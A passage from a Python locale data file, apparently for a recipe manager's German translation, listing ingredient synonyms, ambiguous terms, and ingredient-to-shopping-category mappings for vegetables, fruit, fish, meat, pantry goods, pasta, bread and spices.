[\"Muskat\",\"Muskatnuss\",\"Muscat\",\"Muscatnuss\"],\n [\"Sesammus\",\"Tahin\"],\n [\"Brokkoli\", \"Broccoli\"],\n [\"Kräuter\",\"gemischte Kräuter\"],\n [\"Langkornreis\",\"Reis\"],\n [\"Eierschwammerl\",\"Pfifferlinge\"],\n [\"Herrenpilze\",\"Steinpilze\"],\n [\"Paradeiser\",\"Tomaten\"],\n\n # Irregular plurals\n [\"Äpfel\",\"Apfel\"],\n [\"Pfirsiche\",\"Pfirsich\"],\n [\"Nüsse\", \"Nuss\"],\n [\"Eier\",\"Ei\"]\n\n #non-standard usage\n\n #fautive/discouraged usages\n ]\n\n # A DICTIONARY CONTAINING INGREDIENT KEYS AND NDBNO for the USDA\n # nutritional database. For these items, we will have nutritional\n # information by default.\n\n NUTRITIONAL_INFO: Mapping[str, Any] = {}\n\n # a dictionary for ambiguous words.\n # key=ambiguous word, value=list of possible non-ambiguous terms\n #\n # Translators: if you have a word that has more than one food meaning\n # in your language, you can add an entry as follow\n\n # AMBIGUOUS = {\n # 'word':['meaning1','meaning2','meaning3'],\n # }\n\n AMBIGUOUS = {\n 'Sellerie':['Sellerie','Staudensellerie'],\n }\n\n\n # triplicates ITEM, KEY, SHOPPING CATEGORY\n # These will be defaults.\n\n # They should include whatever foods might be standard for your\n # locale, with whatever sensible default categories you can think of\n # (again, thinking of your locale, not simply translating what I've\n # done).\n\n # Items provided here will automatically be recognized and go onto the\n # given category in a user's shopping list by default.\n\n # Don't feel obligated to translate every item -- especially since not\n # all items will be common for all locales. However, the more items\n # you can put here, the more the user will get the sense that gourmet\n # u\"knows\" about foods that they enter.\n\n # I generated the below list using the wikipedia entry on foods as my\n # starting point. You may want to do something similar for your\n # locale. Also, if the syntax of the below is too complicated, you\n # can send me a list of category headings and ingredients for your\n # locale and I'll do the necessary formatting \n\n INGREDIENT_DATA = [ ## G e m ü s e\n (\"Alfaalfa\", \"Alfalfa\", \"Gemüse\"), # alfalfa sprouts\n (\"Anis\", \"Anis\", \"Gemüse\"), # anise\n (\"Artischocke\", \"Artischocke\", \"Gemüse\"), # artichoke\n (\"Ölranke\", \"Ölranke\", \"Gemüse\"), # rocket\n (\"Spargel\", \"Spargel\", \"Gemüse\"), # asparagus (white)\n (\"weißer Spargel\", \"Spargel, weißer\", \"Gemüse\"), # asparagus - white\n (\"grüner Spargel\", \"Spargel, grüner\", \"Gemüse\"), # asparagus - green\n (\"Aubergine\", \"Aubergine\", \"Gemüse\"), # aubergine\n (\"Avocado\", \"Avocado\", \"Gemüse\"), # avocado\n (\"Brokkoli\", \"Brokkoli\", \"Gemüse\"), # broccoli\n (\"Spinat\", \"Spinat\", \"Gemüse\"), # spinach\n (\"Rosenkohl\", \"Kohl, Rosenkohl\", \"Gemüse\"), # brussels sprouts\n (\"Kohl\", \"Kohl\", \"Gemüse\"), # cabbage\n (\"Weißkohl\", \"Kohl, Weißkohl\", \"Gemüse\"), # white cabbage\n (\"Rotkohl\", \"Kohl, Rotkohl\", \"Gemüse\"), # red cabbage\n (\"Blumenkohl\", \"Kohl, Blumenkohl\", \"Gemüse\"), # cauliflower\n (\"Chinakohl\", \"Kohl, Chinakohl\", \"Gemüse\"), # china cabbage\n (\"Kohlrabi\", \"Kohl, Kohlrabi\", \"Gemüse\"), # kohlrabi\n (\"Grünkohl\", \"Kohl, Grünkohl\", \"Gemüse\"), # kale\n\n (\"Bleichsellerie\", \"Bleichsellerie\", \"Gemüse\"), # celery\n (\"Zitronengras\", \"Zitronengras\", \"Gemüse\"), # lemon grass\n (\"Mais\", \"Mais\", \"Gemüse\"), # corn\n\n (\"Champignons\", \"Champignons\", \"Gemüse\"), # button mushrooms\n (\"Pilze\", \"Pilze\", \"Gemüse\"), # large mushrooms\n (\"Steinpilz\", \"Steinpilze\", \"Gemüse\"), # mushrooms\n (\"Pfifferlinge\", \"Pfifferlinge\", \"Gemüse\"), # other woodland fungus\n\n (\"Senfkeimlinge\", \"Senfkeimlinge\", \"Gemüse\"), # mustard greens\n (\"Brennessel\", \"Brennessel\", \"Gemüse\"), # nettles\n (\"Okra\", \"Okra\", \"Gemüse\"), # okra\n (\"Schnittlauch\", \"Schnittlauch\", \"Gemüse\"), # chives\n\n (\"Zwiebeln\", \"Zwiebeln\", \"Gemüse\"), # onion\n (\"Schalotte\", \"Schalotte\", \"Gemüse\"), # shallot\n (\"Frühlingszwiebel\", \"Frühlingszwiebel\", \"Gemüse\"), # spring onion, scallion\n (\"rote Zwiebeln, rot\", \"Zwiebeln, rote\", \"Gemüse\"), # red (spanish) onion\n (\"weiße Zwiebeln\", \"Zwiebeln, weiße\", \"Gemüse\"), # white onion\n (\"gelbe Zwiebeln\", \"Zwiebeln, gelbe\", \"Gemüse\"), # yellow onion\n (\"Metzgerzwiebeln\", \"Zwiebeln, Metzger-\", \"Gemüse\"), # large onion (salad)\n (\"Speisezwiebeln\", \"Zwiebeln, Speise-\", \"Gemüse\"), # standard cooking onion\n (\"Knoblauch\", \"Knoblauch\", \"Gemüse\"), # garlic\n (\"Porree\", \"Porree\", \"Gemüse\"), # leek\n\n (\"Paprika\", \"Paprika\", \"Gemüse\"), # pepper\n (\"rote Paprika\", \"Paprika, rote\", \"Gemüse\"), # red bell pepper\n (\"grüne Paprika\", \"Paprika, grüne\", \"Gemüse\"), #\n (\"gelbe Paprika\", \"Paprika, gelbe\", \"Gemüse\"), #\n (\"Chile\", \"Chile\", \"Gemüse\"), # chilli pepper\n (\"Jalapeño-Chile\", \"Chile, Jalapeño\", \"Gemüse\"), # jalapeño pepper\n (\"Habanero-Chile\", \"Chile, Habanero\", \"Gemüse\"), # habanero pepper\n\n (\"Radieschen\", \"Radieschen\", \"Gemüse\"), # radish\n (\"Rote Beet\", \"Rote Beet\", \"Gemüse\"), # beetroot\n (\"Möhren\", \"Möhren\", \"Gemüse\"), # carrot\n (\"Rettich\", \"Rettich\", \"Gemüse\"), # horse radish\n (\"Wasabi\", \"Wasabi\", \"Gemüse\"), # japanese horseraddish\n (\"Sellerie\", \"Sellerie\", \"Gemüse\"), # celeriac\n (\"Pastinake\", \"Pastinake\", \"Gemüse\"), # parsnip\n (\"Kohlrübe\", \"Kohlrübe\", \"Gemüse\"), # turnip\n (\"Fenchel\", \"Fenchel\", \"Gemüse\"), # fennel\n\n (\"Kopfsalat\", \"Kopfsalat\", \"Gemüse\"), # lettuce\n (\"Rucolasalat\", \"Rucolasalat\", \"Gemüse\"), # rucola\n (\"Friseesalat\", \"Friseesalat\", \"Gemüse\"), # open lettuce\n (\"Feldsalat\", \"Feldesalat\", \"Gemüse\"), # lettuce\n\n (\"Saubohnen\", \"Saubohnen\", \"Gemüse\"), # broad beans\n (\"Bobby Bohnen\", \"Bobby Bohnen\", \"Gemüse\"), # small green beans\n (\"Haricots\", \"Haricots\", \"Gemüse\"), # haricot beans\n (\"Carbasc\", \"Carbasc\", \"Gemüse\"), # runner beans\n (\"Erbsen\", \"Erbsen\", \"Gemüse\"), # peas\n (\"Zuckererbsen\", \"Zuckererbsen\", \"Gemüse\"), # mange tous\n\n (\"Zucchini\", \"Zucchini\", \"Gemüse\"), # zucchini\n (\"Gurke (Salat-)\", \"Gurke (Salat-)\", \"Gemüse\"), # cucumber\n\n (\"Kürbis\", \"Kürbis\", \"Gemüse\"), # pumpkin\n\n (\"Cocktailtomaten\", \"Tomaten, Cocktail-\", \"Gemüse\"), # cocktail (cherry) tomato\n (\"Tomaten\", \"Tomaten\", \"Gemüse\"), # cherry tomato\n (\"Rispentomaten\", \"Tomaten, Rispen-\", \"Gemüse\"), # tomato on stems\n\n (\"Kartoffel\", \"Kartoffel\", \"Gemüse\"), # potato\n (\"Speisekartoffeln\", \"Kartoffeln, Speise-\", \"Gemüse\"), # standard cooking potatoes\n (\"Süßkartoffel\", \"Süßkartoffel\", \"Gemüse\"), # sweet potato\n\n (\"Jamswurzel\", \"Jamswurzel\", \"Gemüse\"), # yam\n (\"Wasserkastanie\", \"Wasserkastanie\", \"Gemüse\"), # water chestnut\n (\"Brunnenkresse\", \"Brunnenkresse\", \"Gemüse\"), # watercress\n\n (\"Oliven\", \"Oliven\", \"Gemüse\"), #\n (\"grüne Oliven\", \"Oliven, grüne\", \"Gemüse\"), #\n (\"schwarze Oliven\", \"Oliven, schwarze\", \"Gemüse\"), #\n\n ## H ü l s e n f r u c h t e\n (\"grüne Bohnen\", \"Bohnen, grüne\", \"Gemüse\"), # green beans\n (\"weiße Bohnen\", \"Bohnen, weiße\", \"Hülsenfrüchte\"), # green beans\n (\"Azuki Bohnen\", \"Bohnen, Azuki\", \"Hülsenfrüchte\"), # azuki beans\n (\"schwarze Bohnen\", \"Bohnen, schwarze\", \"Hülsenfrüchte\"), # black beans\n (\"Borlottibohnen\", \"Bohnen, Borlotti-\", \"Hülsenfrüchte\"), # borlotti beans (not sure)\n (\"Kichererbsen\", \"Kichererbsen\", \"Hülsenfrüchte\"), # chickpeas, garbanzos, or ceci beans\n (\"Kidneybohnen\", \"Bohnen, Kidney-\", \"Hülsenfrüchte\"), # kidney beans\n (\"Teller-Linsen\", \"Linsen, Teller-\", \"Hülsenfrüchte\"), # standard lentils\n (\"rote Linsen\", \"Linsen, rote\", \"Hülsenfrüchte\"), # red lentils\n (\"grüne Linsen\", \"Linsen, grüne\", \"Hülsenfrüchte\"), # green lentils\n (\"schwarze Linsen\", \"Linsen, schwarze\", \"Hülsenfrüchte\"), # black lentils\n (\"Gartenbohnen\", \"Gartenbohnen\", \"Gemüse\"), # lima bean or butter bean\n (\"Mungbohnen\", \"Bohnen, Mung-\", \"Hülsenfrüchte\"), # mung beans\n (\"Sojabohnen\", \"Bohnen, Soja-\", \"Hülsenfrüchte\"), # soybeans\n (\"grüne Erbsen\", \"Erbsen, grüne\", \"Hülsenfrüchte\"), # green dried peas\n (\"gelbe Erbsen\", \"Erbsen, gelbe\", \"Hülsenfrüchte\"), # yellow dried peas\n (\"Schälerbsen\", \"Erbsen, Schälerbsen\", \"Hülsenfrüchte\"), #\n\n ## F r u c h t e\n (\"Obst\", \"Obst\", \"Obst\"), # general fruit\n (\"Äpfel\", \"Äpfel\", \"Obst\"), # apple\n (\"rote Äpfel\", \"Äpfel, rote\", \"Obst\"), #\n (\"goldene Äpfel\", \"Äpfel, goldene\", \"Obst\"), #\n (\"Granny Smith Äpfel\", \"Äpfel, Granny Smith\", \"Obst\"), #\n (\"Fuji Äpfel\", \"Äpfel, Fuji-\", \"Obst\"), #\n (\"grüne Äpfel\", \"Äpfel, grüne\", \"Obst\"), # green apple\n (\"Granatäpfel\", \"Granatäpfel\", \"Obst\"), # pomegranate\n (\"Quitte\", \"Quitte\", \"Obst\"), # quince\n (\"Hagebutten\", \"Hagebutten\", \"Obst\"), # rose hip\n (\"Aprikosen\", \"Aprikosen\", \"Obst\"), # apricot\n (\"Birnen\", \"Birnen\", \"Obst\"), # pear\n (\"Conference Birnen\", \"Birnen, Conference\", \"Obst\"), # pear, large conference\n (\"William Birnen\", \"Birnen, William\", \"Obst\"), # pear, standard william\n (\"Kirschen\", \"Kirschen\", \"Obst\"), # cherry\n (\"Pflaumen\", \"Pflaumen\", \"Obst\"), # plum\n (\"Pfirsiche\", \"Pfirsiche\", \"Obst\"), # peach\n (\"Nektarinen\", \"Nektarinen\", \"Obst\"), # nectarine\n (\"Brombeeren\", \"Beeren, Brombeeren\", \"Obst\"), # blackberry\n (\"Himbeeren\", \"Beeren, Himbeeren\", \"Obst\"), # raspberry\n (\"Erdbeeren\", \"Beeren, Erdbeeren\", \"Obst\"), # raspberry\n (\"Heidelbeeren\", \"Beeren, Heidelbeeren\", \"Obst\"), # bilberry\n (\"Blaubeeren\", \"Beeren, Blaubeeren\", \"Obst\"), # blueberry\n (\"Preiselbeeren\", \"Beeren, Preiselbeeren\", \"Obst\"), # cranberry\n (\"Johannisbeeren\", \"Beeren, Johannisbeeren\", \"Obst\"), # red currant\n (\"schwarze Johannisbeeren\", \"Beeren, schwarze Johannisbeeren\", \"Obst\"), # black currant\n (\"Holunderbeeren\", \"Beeren, Holunderbeeren\", \"Obst\"), # elderberry\n (\"Stachelbeeren\", \"Stachelbeeren\", \"Obst\"), # gooseberry\n (\"Kiwi\", \"Kiwi\", \"Obst\"), # kiwi fruit\n (\"Papaya\", \"Papaya\", \"Obst\"), # pawpaw\n (\"Zuckermelonen\", \"Zucker-\", \"Obst\"), # cantaloupe\n (\"Honigmelonen\", \"Melonen, Honig-\", \"Obst\"), # honeydew melon\n (\"Galiamelonen\", \"Melonen, Galia-\", \"Obst\"), # galia melon\n (\"Netzmelonen\", \"Melonen, Netz-\", \"Obst\"), # net melon\n (\"Wassermelonen\", \"Melonen, Wasser-\", \"Obst\"), # watermelon\n (\"Feigen\", \"Feigen\", \"Obst\"), # fig\n (\"Weintrauben\", \"Weintrauben\", \"Obst\"), # grape\n (\"Tafeltrauben\", \"Weintrauben, Tafel\", \"Obst\"), # green grapes\n (\"blaue Weintrauben\", \"Weintrauben, blau\", \"Obst\"), # black grapes\n (\"Datteln\", \"Datteln\", \"Obst\"), # date\n (\"Grapefruit\", \"Grapefruit\", \"Obst\"), # grapefruit\n (\"Limetten\", \"Limetten\", \"Obst\"), # lime\n (\"Kumquat\", \"Kumquat\", \"Obst\"), # kumquat\n (\"Zitronen\", \"Zitronen\", \"Obst\"), # lemon\n (\"Mandarinen\", \"Mandarinen\", \"Obst\"), # mandarin\n (\"Klementinen\", \"Klementinen\", \"Obst\"), # clementine\n (\"Tangerinen\", \"Tangerinen\", \"Obst\"), # tangerine\n (\"Orangen\", \"Orangen\", \"Obst\"), # orange\n (\"Ugli\", \"Ugli\", \"Obst\"), # ugli fruit\n (\"Guave\", \"Guave\", \"Obst\"), # guava\n (\"Litschi\", \"Litschi\", \"Obst\"), # lychee\n (\"Passionsfrucht\", \"Passionsfrucht\", \"Obst\"), # passion fruit\n (\"Banane\", \"Banane\", \"Obst\"), # banana\n (\"Wegerich\", \"Wegerich\", \"Obst\"), # plantain\n (\"Kokosnuss\", \"Kokosnuss\", \"Obst\"), # coconut\n (\"Durion\", \"Durion\", \"Obst\"), # durian\n (\"Mango\", \"Mangue\", \"Obst\"), # mango\n (\"Papaya\", \"Papaya\", \"Obst\"), # papaya\n (\"Ananas\", \"Ananas\", \"Obst\"), # pineapple\n (\"Tamarinde\", \"Tamarinde\", \"Obst\"), # tamarind\n (\"Rhabarber\", \"Rhabarber\", \"Obst\"), # rhubarb\n\n ## M e e r e s f r ü c h t e\n (\"Anchovis\", \"Anchovis\", \"Meeresfrüchte\"), # anchovy\n (\"Barsch\", \"Barsch\", \"Meeresfrüchte\"), # bass\n (\"Kugelfisch\", \"Kugelfisch\", \"Meeresfrüchte\"), # blowfish\n (\"Wels\", \"Wels\", \"Meeresfrüchte\"), # catfish\n (\"Dorsch\", \"Dorsch\", \"Meeresfrüchte\"), # cod\n (\"Aal\", \"Aal\", \"Meeresfrüchte\"), # eel\n (\"Flunder\", \"Flunder\", \"Meeresfrüchte\"), # flounder\n (\"Schellfisch\", \"Schellfisch\", \"Meeresfrüchte\"), # haddock\n (\"Haddock\", \"Haddock\", \"Meeresfrüchte\"), # smoked haddock\n (\"Heilbutt\", \"Heilbutt\", \"Meeresfrüchte\"), # halibut\n (\"Zander\", \"Zander\", \"Meeresfrüchte\"), # pike\n (\"Seelachs\", \"Seelachs\", \"Meeresfrüchte\"), # pollock\n (\"Sardine\", \"Sardine\", \"Meeresfrüchte\"), # sardine\n (\"Sprotte\", \"Sprotte\", \"Meeresfrüchte\"), # sprat\n (\"Lachs\", \"Lachs\", \"Meeresfrüchte\"), # salmon\n (\"Sägebarsch\", \"Sägebarsch\", \"Meeresfrüchte\"), # sea bass\n (\"Hai\", \"Hai\", \"Meeresfrüchte\"), # shark\n (\"Seezunge\", \"Seezunge\", \"Meeresfrüchte\"), # sole\n (\"Stör\", \"Stör\", \"Meeresfrüchte\"), # sturgeon\n (\"Schwertfisch\", \"Schwertfisch\", \"Meeresfrüchte\"), # swordfish\n (\"Forelle\", \"Forelle\", \"Meeresfrüchte\"), # trout\n (\"Thunfisch\", \"Thunfisch\", \"Meeresfrüchte\"), # tuna\n (\"Weißfisch\", \"Weißfisch\", \"Meeresfrüchte\"), # whitefish\n (\"Wittling\", \"Wittling\", \"Meeresfrüchte\"), # whiting\n (\"Rogen\", \"Rogen\", \"Meeresfrüchte\"), # roe of fish\n (\"Kaviar\", \"Kaviar\", \"Meeresfrüchte\"), # caviar\n (\"Krebs\", \"Krebs\", \"Meeresfrüchte\"), # crab\n (\"Hummer\", \"Hummer\", \"Meeresfrüchte\"), # lobster\n (\"Garnele\", \"Garnele\", \"Meeresfrüchte\"), # prawns\n (\"Krabbe\", \"Krabbe\", \"Meeresfrüchte\"), # shrimp\n (\"Klaffmuschel\", \"Klaffmuschel\", \"Meeresfrüchte\"), # clam\n (\"Muschel\", \"Muschel\", \"Meeresfrüchte\"), # mussel\n (\"Tintenfisch\", \"Tintenfisch\", \"Meeresfrüchte\"), # octopus\n (\"Auster\", \"Auster\", \"Meeresfrüchte\"), # oyster\n (\"Schnecke\", \"Schnecke\", \"Meeresfrüchte\"), # snail\n (\"Kalmar\", \"Kalmar\", \"Meeresfrüchte\"), # squid\n (\"Kammuschel\", \"Kammuschel\", \"Meeresfrüchte\"), # scallop\n\n ## F l e i s c h\n (\"Speck\", \"Speck\", \"Fleisch\"), # chopped bacon\n (\"Bacon\", \"Bacon\", \"Fleisch\"), # bacon\n (\"Schinken\", \"Schinken\", \"Fleisch\"), # ham\n (\"Hammel\", \"Hammel\", \"Fleisch\"), # mutton\n (\"Lamm\", \"Lamm\", \"Fleisch\"), # lamb\n (\"Kalb\", \"Kalb\", \"Fleisch\"), # veal\n (\"Steak\", \"Steak\", \"Fleisch\"), # steak\n (\"Hamburger\", \"Hamburger\", \"Fleisch\"), # hamburger\n (\"Roastbeef\", \"Roastbeef\", \"Fleisch\"), # roast beef\n (\"Hähnchen\", \"Hähnchen\", \"Fleisch\"), # chicken\n (\"Pute\", \"Pute\", \"Fleisch\"), # turkey\n (\"Ente\", \"Ente\", \"Fleisch\"), # duck\n (\"Gans\", \"Gans\", \"Fleisch\"), # goose\n (\"Rind\", \"Rind\", \"Fleisch\"), # beef\n (\"Hackfleisch\", \"Hackfleisch\", \"Fleisch\"), # mince beef\n (\"Hase\", \"Hase\", \"Fleisch\"), # hare\n (\"Kaninchen\", \"Kaninchen\", \"Fleisch\"), # rabbit\n (\"Hirsch\", \"Hirsch\", \"Fleisch\"), # deer\n (\"Hühnerbrust\", \"Hühnerbrust\", \"Fleisch\"), # chicken breast\n (\"Schweinefleisch\", \"Schweinefleisch\", \"Fleisch\"), # pork\n (\"Chorizo\", \"Chorizo\", \"Fleisch\"), # chorizo\n (\"Salami\", \"Salami\", \"Fleisch\"), # salami\n (\"Wurst\", \"Wurst\", \"Fleisch\"), # sausage\n (\"Bratwurst\", \"Bratwurst\", \"Fleisch\"), # sausage\n (\"Weißwurst\", \"Weißwurst\", \"Fleisch\"), # sausage\n (\"Currywurst\", \"Currywurst\", \"Fleisch\"), # sausage\n\n ## L e b e n s m i t t e l\n (\"Weizenmehl\", \"Mehl, Weizen-\", \"Lebensmittel\"), # all purpose flour\n (\"Vollkorn Weizenmehl\", \"Mehl, Vollkorn Weizen-\", \"Lebensmittel\"), # wholemeal flour\n (\"Hirsemehl\", \"Mehl, Hirse-\", \"Lebensmittel\"), # flour\n (\"Roggenmischung\", \"Mehl, Roggenmischung\", \"Lebensmittel\"), # rye flour\n (\"Backpulver\", \"Backpulver\", \"Lebensmittel\"), # baking powder\n (\"Natron\", \"Natron\", \"Lebensmittel\"), # baking soda\n (\"Schokolade\", \"Schokolade\", \"Lebensmittel\"), # chocolate\n (\"Schokotröpfen\", \"Schokotröpfen\", \"Lebensmittel\"), # chocolate chips\n (\"Zucker\", \"Zucker\", \"Lebensmittel\"), # suger\n (\"Süßstoff\", \"Süßstoff\", \"Lebensmittel\"), # artificial sweetner\n (\"brauner Zucker\", \" Zucker, braun\", \"Lebensmittel\"), # brown suger\n (\"weißer Zucker\", \"Zucker, weiß\", \"Lebensmittel\"), # white sugar\n (\"Raffinade\", \"Zucker, Raffinade\", \"Lebensmittel\"), # castor sugar\n (\"Salz\", \"Salz\", \"Lebensmittel\"), # salt\n (\"Meersalz\", \"Salz, Meer-\", \"Lebensmittel\"), # sea salt\n (\"Rosinen\", \"Rosinen\", \"Lebensmittel\"), # currents\n (\"Sultanienen\", \"Sultanienen\", \"Lebensmittel\"), # sultanas\n (\"geraspelte Kokosnuss\", \"Kokosnuss, geraspelt\", \"Lebensmittel\"), # (modifier?)\n (\"Vanille\", \"Vanille\", \"Lebensmittel\"), # vanilla\n (\"Vanilleessenz\", \"Vanilleessenz\", \"Lebensmittel\"), # vanilla extract\n (\"Walnusskerne\", \"Walnusskerne\", \"Lebensmittel\"), # walnut\n (\"Cashewnüsse\", \"Cashewnüsse\", \"Lebensmittel\"), # cashew nut\n (\"Mandeln\", \"Mandeln\", \"Lebensmittel\"), # almonds\n (\"Erdnüsse\", \"Erdnüsse\", \"Lebensmittel\"), # peanut\n (\"Kartoffelpüree\", \"Kartoffelpüree\", \"Lebensmittel\"), # potato mash\n (\"Klöße\", \"Klöße\", \"Lebensmittel\"), # potato dumplings\n (\"Polenta\", \"Polenta\", \"Lebensmittel\"), # yellow cornmeal\n (\"kernige Haferflocken\", \"Haferflocken, kernig\", \"Lebensmittel\"), # rolled oats\n (\"zarte Haferflocken\", \"Haferflocken, zart\", \"Lebensmittel\"), # fine rolled oats\n (\"Ketchup\", \"Ketchup\", \"Lebensmittel\"), # ketchup\n (\"Mayonnaise\", \"Mayonnaise\", \"Lebensmittel\"), # mayonnaise\n (\"Knäckebrot\", \"Knäckebrot\", \"Lebensmittel\"), # ryebread wafers\n (\"Dosentomaten\", \"Tomaten, Dosen-\", \"Lebensmittel\"), # canned tomatoes\n (\"Dosenmais\", \"Mais, Dosen-\", \"Lebensmittel\"), # canned sweetcorn\n\n (\"Sonnenblumenkerne\", \"Sonnenblumenkerne\", \"Lebensmittel\"), # sunflower seeds\n (\"Sesammus\", \"Sesammus\", \"Lebensmittel\"), # sesame seeds\n\n (\"Zitronensaft\", \"Zitronensaft\", \"Lebensmittel\"), # lemon juice\n (\"Zitronenkonzentrat\", \"Zitronenkonzentrat\", \"Lebensmittel\"), # lemon concentrate\n (\"Limettensaft\", \"Saft, Limetten-\", \"Lebensmittel\"), # lime juice\n (\"Orangensaft\", \"Saft, Orangen\", \"Lebensmittel\"), # whole orange juice\n (\"Orangennektar\", \"Saft, Orangennektar\", \"Lebensmittel\"), # orange juice\n\n (\"Tomatensuppe\", \"Tomatensuppe\", \"Lebensmittel\"), # tomato sauce\n (\"Bouillon\", \"Bouillon\", \"Lebensmittel\"), # broth\n (\"Gemüsebouillon\", \"Bouillon, Gemüse-\", \"Lebensmittel\"), # vegetable broth\n (\"Hühnerbouillon\", \"Bouillon, Hühner-\", \"Lebensmittel\"), # broth, chicken\n (\"Hollandaise\", \"Hollandaise\", \"Lebensmittel\"), # hollandais sauce\n\n (\"gehackte Tomaten\", \"Tomaten, gehackt\", \"Lebensmittel\"), # chopped tomato\n (\"geschälte Tomaten\", \"Tomaten, geschält\", \"Lebensmittel\"), # peeled tomato\n (\"passierte Tomaten\", \"Tomaten, passiert\", \"Lebensmittel\"), # mashed tomato\n (\"Tomatenmark\", \"Tomatenmark\", \"Lebensmittel\"), # pureed tomato\n\n (\"Kekse\", \"Kekse\", \"Lebensmittel\"), # biscuits\n (\"Müsli\", \"Müsli\", \"Lebensmittel\"), # muesli\n (\"Pudding\", \"Pudding\", \"Lebensmittel\"), # instant custard pudding\n (\"Stärke\", \"Stärke\", \"Lebensmittel\"), # corn starch\n\n ## R e i s u n d T e i g w a r e n\n (\"Nudeln\", \"Nudeln\", \"Reis & Teigwaren\"), # pasta\n (\"Spaghetti\", \"Spagghetti\", \"Reis & Teigwaren\"), # spaghetti\n (\"Penne\", \"Penne\", \"Reis & Teigwaren\"), # pasta tubes\n (\"Canelonni\", \"Canelonni\", \"Reis & Teigwaren\"), #\n (\"Fusilli\", \"Fusilli\", \"Reis & Teigwaren\"), # pasta twirls\n (\"Riccioli\", \"Riccioli\", \"Reis & Teigwaren\"), # pasta twirls\n (\"Lasagna\", \"Lasagna\", \"Reis & Teigwaren\"), # pasta sheets\n (\"Vermicelli\", \"Vermicelli\", \"Reis & Teigwaren\"), # vermicelli\n\n (\"Teig\", \"Teig\", \"Reis & Teigwaren\"), # dough\n (\"Hefeteig\", \"Teig, Hefe-\", \"Reis & Teigwaren\"), # pastry dough\n (\"Pizzateig\", \"Teig, Pizza-\", \"Reis & Teigwaren\"), # pizza dough\n\n (\"Langkornreis\", \"Reis, Langkorn-\", \"Reis & Teigwaren\"), # rice longcorn\n (\"Basmatireis\", \"Reis, Basmati-\", \"Reis & Teigwaren\"), # basmati rice\n (\"Milchreis\", \"Reis, Milch-\", \"Reis & Teigwaren\"), # pudding rice\n (\"Naturreis\", \"Reis, Natur-\", \"Reis & Teigwaren\"), # whole rice\n (\"Wildreis\", \"Reis, Wild-\", \"Reis & Teigwaren\"), # wild (black) rice\n (\"Spitzenlangkornreis\", \"Reis, Spitzenlangkorn-\", \"Reis & Teigwaren\"), # rice longcorn cook\n\n ## B r o t\n (\"Brot\", \"Brot, allgemeines\", \"Brot\"), # bread, any\n (\"Weißbrot\", \"Brot, weiß\", \"Brot\"), # white bread\n (\"Toastbrot\", \"Brot, Toast-\", \"Brot\"), # sliced white toasting bread\n (\"Vollkornbrot\", \"Brot, Vollkorn-\", \"Brot\"), # wholemeal bread\n (\"Sonnenblumenkernbrot\", \"Brot, Sonnenblumenkern-\", \"Brot\"), # sunflower seed wholmeal\n (\"Kürbiskernbrot\", \"Brot, Kürbiskern-\", \"Brot\"), # pupkin seed wholemeal\n (\"Sesambrot\", \"Brot, Sesam-\", \"Brot\"), # sesame seed wholemeal\n (\"Dreikornbrot\", \"Brot, Dreikorn-\", \"Brot\"), # 3 corn wholemeal bread\n (\"Krustenbrot\", \"Brot, Krusten-\", \"Brot\"), # Crusty wholemeal bread\n (\"Landbrot\", \"Brot, Land-\", \"Brot\"), # wholemeal bread\n (\"Fladenbrot\", \"Brot, Fladen-\", \"Brot\"), # turkish round bread\n (\"Pumpernickel\", \"Pumpernickel\", \"Brot\"), # pumpernickel bread\n\n ## K r ä u t e r u n d G e w ü r z e\n (\"Kräuter\", \"Kräuter, gemischt\", \"Gemüse\"), # mixed herbs\n (\"Petersilie\", \"Petersilie\", \"Gemüse\"), # parsley\n (\"schwarze Pfeffer\", \"Pfeffer schwarz\", \"Kräuter u Gewürze\"), # black pepper\n (\"Cayennepfeffer\", \"Pfeffer, Cayenne\", \"Kräuter u Gewürze\"), # cayenne\n (\"Kräuter de Provence\", \"Kräuter de Provence\", \"Kräuter u Gewürze\"), # Herbs de Provence\n (\"Kräutersalz\", \"Kräutersalz\", \"Kräuter u Gewürze\"), # Herbed salt\n (\"Lorbeerblatt\", \"Lorbeerblatt\", \"Kräuter u Gewürze\"), # Bay leaf\n (\"Gewürznelken\", \"Gewürznelken\", \"Kräuter u Gewürze\"), #\n (\"Chilipulver\", \"Chilipulver\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"Curry\", \"Curry\", \"Kräuter u Gewürze\"), # curry powder\n (\"Currypaste\", \"Currypaste\", \"Kräuter u Gewürze\"), # curry paste\n (\"Madras Curry\", \"Curry, madras\", \"Kräuter u Gewürze\"), # hotter curry powder\n (\"Garam Masala\", \"Garam Masala\", \"Kräuter u Gewürze\"), #\n (\"Zimtschote\", \"Zimt, Zimtschote\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"gemahlener Zimt\", \"Zimt, gemahlener\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"Korianderkerne\", \"Korianderkerne\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"gemahlener Koriander\", \"Koriander, gemahlener\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"Cuminkerne\", \"Cuminkerne\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"gemahlener Cumin\", \"Cumin, gemahlener\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"Senfkerne\", \"Senfkerne\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"Senf\", \"Senf\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"Dijon-Senf\", \"Senf, Dijon\", \"Kräuter u Gewürze\"), # (modifier?)\n (\"Muskatnuss\", \"Muskatnuss\", \"Kräuter u Gewürze\"), # nutmeg\n (\"Paprika, gemahlen\", \"Paprika, gemahlen\", \"Kräuter u Gewürze\"), #\n (\"Ingwerpulver\", \"Ingwer, Ingwerpulver\", \"Kräuter u Gewürze\"), # ground ginger\n (\"Kurkuma\", \"Kurkuma\", \"Kräuter u Gewürze\"), # turmeric, curcuma\n (\"Majoran\", \"Majoran\", \"Kräuter u Gewürze\"), # turmeric, curcuma\n (\"Oregano\", \"Oregano\", \"Kräuter u Gewürze\"), # oregano\n (\"Basilikum, gerebelt\", \"Basilikum, gerebelt\", \"Kräuter u Gewürze\"), # basil, crushed\n (\"frisches Basilikum\", \"Basilikum, frisches\", \"Kräuter u Gewürze\"), # fresh basil leaves\n (\"frischer Koriander\", \"Koriander, frischer\", \"Kräuter u Gewürze\"), # fresh coriander leaves\n (\"frisches Schnittlauch\", \"Schnittlauch, frisches\", \"Kräuter u Gewürze\"), # fresh chives\n (\"frischer Ingwer\", \"Ingwer, frischer\", \"Kräuter u Gewürze\"), # fresh ginger\n (\"Ingwerpaste\", \"Ingwerpaste\", \"Kräuter u 